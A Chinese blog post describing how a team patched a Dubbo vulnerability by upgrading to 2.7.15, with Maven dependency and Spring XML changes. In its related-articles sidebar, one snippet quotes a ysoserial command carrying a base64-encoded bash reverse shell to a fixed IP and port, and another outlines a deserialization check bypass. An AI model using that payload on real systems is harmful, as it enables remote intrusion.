生产dubbo漏洞问题修复

已于 2023-06-05 14:32:21 修改
阅读量1.3k 收藏 2
点赞数
分类专栏: 生产问题 文章标签: dubbo java-zookeeper zookeeper 后端
于 2023-02-01 16:46:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44939862/article/details/128833242
版权

目前dubbo版本使用2.6.4版本
生产要求升级至2.6.12、2.7.15、3.0.5及以上版本

根据实际情况,现将dubbo版本升级至2.7.15

一、dubbo漏洞情景一
原依赖

    <dependency>
        <groupId>org.apache.dubbo</groupId>
        <artifactId>dubbo-spring-boot-starter</artifactId>
        <version>2.0.0</version>
    </dependency>
    <dependency>
        <groupId>org.apache</groupId>
        <artifactId>dubbo</artifactId>
        <version>2.6.4</version>
    </dependency>
    <dependency>
        <groupId>org.apache.zookeeper</groupId>
        <artifactId>zookeeper</artifactId>
        <version>3.4.6</version>
    </dependency>
    <dependency>
        <groupId>org.apache.curator</groupId>
        <artifactId>curator-recipes</artifactId>
        <version>2.12.0</version>
        <exclusions>
            <exclusion>
                <groupId>org.apache.zookeeper</groupId>
                <artifactId>zookeeper</artifactId>
            </exclusion>
        </exclusions>
    </dependency>

升级后依赖

    <dependency>
        <groupId>org.apache.dubbo</groupId>
        <artifactId>dubbo-spring-boot-starter</artifactId>
        <version>2.7.15</version>
    </dependency>
    <dependency>
        <groupId>org.apache</groupId>
        <artifactId>dubbo</artifactId>
        <version>2.7.15</version>
    </dependency>
    <dependency>
        <groupId>org.apache.zookeeper</groupId>
        <artifactId>zookeeper</artifactId>
        <version>3.4.6</version>
    </dependency>
    <dependency>
        <groupId>org.apache.curator</groupId>
        <artifactId>curator-recipes</artifactId>
        <version>4.2.0</version>
        <exclusions>
            <exclusion>
                <groupId>org.apache.zookeeper</groupId>
                <artifactId>zookeeper</artifactId>
            </exclusion>
        </exclusions>
    </dependency>

鉴于dubbo2.7.x之后的版本alibaba交由apache管理,故将程序中包含com.alibaba.dubbo的引用修改为org.apache.dubbo

//基于生产情况,将@EnableDubboConfiguration修改为@EnableDubbo
// import com.alibaba.dubbo.spring.boot.annotation.EnableDubboConfiguration;
import org.apache.dubbo.config.spring.context.annotation.EnableDubbo;

二:dubbo漏洞场景二
原依赖

		<dependency>
            <groupId>org.apache</groupId>
            <artifactId>dubbo</artifactId>
            <version>2.6.4</version>
        </dependency>

现依赖

		<dependency>
            <groupId>org.apache</groupId>
            <artifactId>dubbo</artifactId>
            <version>2.7.15</version>
        </dependency>
        <dependency>
            <groupId>com.alibaba.spring</groupId>
            <artifactId>spring-context-support</artifactId>
            <version>1.0.11</version>
        </dependency>

//基于生产情况,将@EnableDubboConfiguration修改为@EnableDubbo
// import com.alibaba.dubbo.spring.boot.annotation.EnableDubboConfiguration;
import org.apache.dubbo.config.spring.context.annotation.EnableDubbo;

//spring-context-support.jar支Reference注解,无需替换为apache的@DubboReference

三、dubbo漏洞场景三
该生产版本是spring项目,使用applicationContext.xml文件配置dubbo
原依赖及文件不可考,现仅展示修复方式

替换如下依赖
该生产版本的spring框架版本过低,升级spring及dubbo相关依赖
补充:还需新增curator-recipes-2.9.1.jar依赖

在这里插入图片描述

//applicationContext.xml修改头信息
//将alibaba的dubbo地址修改为apache的dubbo地址
//xmlns:dubbo="http://dubbo.apache.org/schema/dubbo"
//http://dubbo.apache.org/schema/dubbo //http://dubbo.apache.org/schema/dubbo/dubbo.xsd
//修改后头信息如下
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
        xmlns:task="http://www.springframework.org/schema/task"
        xmlns:jee="http://www.springframework.org/schema/jee" xmlns:tx="http://www.springframework.org/schema/tx"
        xmlns:dubbo="http://dubbo.apache.org/schema/dubbo"
        xmlns:context="http://www.springframework.org/schema/context"
        xsi:schemaLocation="
        http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans-3.0.xsd
        http://www.springframework.org/schema/util http://www.springframework.org/schema/util/spring-util-3.0.xsd
        http://www.springframework.org/schema/jee http://www.springframework.org/schema/jee/spring-jee-3.0.xsd
        http://www.springframework.org/schema/lang http://www.springframework.org/schema/lang/spring-lang-3.0.xsd
        http://www.springframework.org/schema/jms http://www.springframework.org/schema/jms/spring-jms-3.0.xsd
        http://www.springframework.org/schema/tx http://www.springframework.org/schema/tx/spring-tx-3.0.xsd
        http://www.springframework.org/schema/aop http://www.springframework.org/schema/aop/spring-aop-3.0.xsd
        http://www.springframework.org/schema/context http://www.springframework.org/schema/context/spring-context-3.0.xsd
        http://dubbo.apache.org/schema/dubbo http://dubbo.apache.org/schema/dubbo/dubbo.xsd"
        default-lazy-init="true">
行山客
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Dubbo 高危漏洞!原来都是反序列化惹得祸
楼下小黑哥
07-09 1165
前言 这周收到外部合作同事推送的一篇文章,【漏洞通告】Apache Dubbo Provider默认反序列化远程代码执行漏洞(CVE-2020-1948)通告。 按照文章披露的漏洞影响范围,可以说是当前所有的 Dubbo 的版本都有这个问题。 无独有偶,这周在 Github 自己的仓库上推送几行改动,不一会就收到 Github 安全提示,警告当前项目存在安全漏洞CVE-2018-10237。 可以看到这两个漏洞都是利用反序列化进行执行恶意代码,可能很多同学跟我当初一样,看到这个一脸懵逼。好端端的反序列化
DUBBO多个版本的jar包
04-02
多个版本的dubbojar包
解决dubbo启动报错的问题
01-28
解决dubbo启动报错,加载失败问题
Dubbo 授权访问
maverickpig的博客
01-27 4447
Dubbo是阿里巴巴公司开源的一个高性能优秀的 服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和 Spring框架无缝集成。dubbo 因配置不当导致授权访问漏洞
Apache Dubbo反序列化漏洞
YJ_12340的博客
05-24 825
Dubbo是阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的RPC实现服务的输出和输入功能,可以和Spring框架无缝集成。2020年06月23日, Apache Dubbo 官方发布了Apache Dubbo 远程代码执行的风险通告,该漏洞编号为,漏洞等级:高危。Apache Dubbo是一款高性能、轻量级的开源Java RPC框架,它提供了三大核心能力:面向接口的远程方法调用,智能容错和负载均衡,以及服务自动注册和发现。
授权访问漏洞总结
最新发布
m0_64481831的博客
06-18 937
以下总结了常见的授权访问漏洞,还在持续更新中,遇到就会补充。欢迎大家关注~
常用的30+种授权访问漏洞汇总
qq_50854662的博客
09-17 5276
常用的30+种授权访问漏洞汇总
Aapche Dubbo Java反序列化漏洞复现
Shanfenglan's blog
12-13 1619
文章目录1. CVE-2019-17564原理利用 1. CVE-2019-17564 原理 Apache Dubbo是一款高性能、轻量级的开源Java RPC服务框架。Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞。 影响版本:Apac
Apache Dubbo(CVE-2019-17564) Java反序列化漏洞复现笔记(最详细版本)
精品博客,你值得一看~
08-25 1010
java -jar ysoserial-master-2874a69f61-1.jar CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE4NC4xMzYvODg4OCAwPiYx}|{base64,-d}|{bash,-i}" > 2.poc #生成反弹shell的脚本2.poc ,这里将刚刚复制的内容贴到双引号里面执行。
漏洞分析|Apache Dubbo反序列化漏洞(CVE-2023-23638)
xuandaoren的博客
11-16 828
所以我们可以通过上面的 Field 赋值机制, 将 SerializeClassChecker 的 INSTANCE 属性更改为我们自定义的 SerializeClassChecker, 然后在这个自定义的 checker 中, 将 JdbcRowSetImpl 加到白名单里面, 或者将黑名单置空, 或者将 OPEN_CHECK_CLASS 更改为 false, 从而绕过这个检查机制。1、关闭对公网开放的Dubbo服务端端口,仅允许可信任的IP访问。回到 realize0 方法, 继续往下看。
修改过的 dubbo-admin war文件 对应 JDK 1.8
11-13
打包教程 https://blog.csdn.net/lm9521/article/details/84030893
Dubbo+Dubbo生产者,Dubbo消费者+Dubbo消费者调用生产者的服务的小demo
09-27
本项目案例“妻子”作为消费者去调用生产者(“丈夫”)的服务--洗碗 本项目需要注意 @DubboReference private HusbandService husbandService; @EnableDubbo @DubboService 这几个注解不能忘,否则会报错,或者...
Apache Dubbo远程代码执行漏洞(CVE-2021-43297)
10-25
Dubbo 升级到 2.6.12、2.7.15、3.0.5 及以上版本
基于Java实现的一款Apache Dubbo漏洞检测工具源代码,包含了信息收集、参数爆破等功能,实现一键漏洞利用检测
08-11
一款Apache Dubbo漏洞检测工具。包含了信息收集、参数爆破等功能,利用获取到的信息一键完成对Dubbo的Provider和Consumer的漏洞利用检测 漏洞扫描 本项目只检测每种检测方式下,影响版本最新的漏洞Dubbo provider...
Dubbo-2.7.22
03-17
解决反序列化漏洞更新包;dubbo-2.7.22.jar ;CVE漏洞
CVE-2020-1948 Apache dubbo远程命令执行漏洞
yyj1781572的博客
04-02 1309
通过该实验了解漏洞产生的原因,掌握基本的漏洞利用及使用方法,并能给出加固方案。
Doliber ERP & CRM 的漏洞复现报告
weixin_62570809的博客
11-02 1261
Doliber ERP & CRM 的漏洞复现
dubbo 循环依赖问题
08-25
Dubbo 的循环依赖问题通常指的是在 Dubbo 服务调用中,出现了循环引用的情况。这种情况下,两个或多个服务之间相互依赖,导致无法正常初始化和调用。 Dubbo 提供了一些机制来解决循环依赖问题: 1. 配置优化: - 在 Dubbo 的 `reference` 配置中,可以通过设置 `init` 属性为 `false` 来禁止立即初始化引用的服务。然后在需要使用该服务的时候再手动触发初始化。 - 可以使用 `lazy` 属性来延迟初始化服务引用。 2. 接口抽象: - 将循环依赖的接口进行拆分,尽量减少接口之间的相互依赖。 3. 使用 `@Reference` 注解: - 在消费者端使用 `@Reference` 注解来引用服务,而不是直接通过 XML 配置文件进行引用。这样可以更加灵活地控制服务的初始化时机。 4. 使用 Setter 方法注入: - 尽量避免使用构造函数注入,而是通过 Setter 方法注入依赖关系。这样可以避免循环引用时的初始化顺序问题。 需要注意的是,循环依赖问题的出现通常意味着系统设计存在一定的问题,因此在设计和实现时要尽量避免出现循环依赖的情况。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值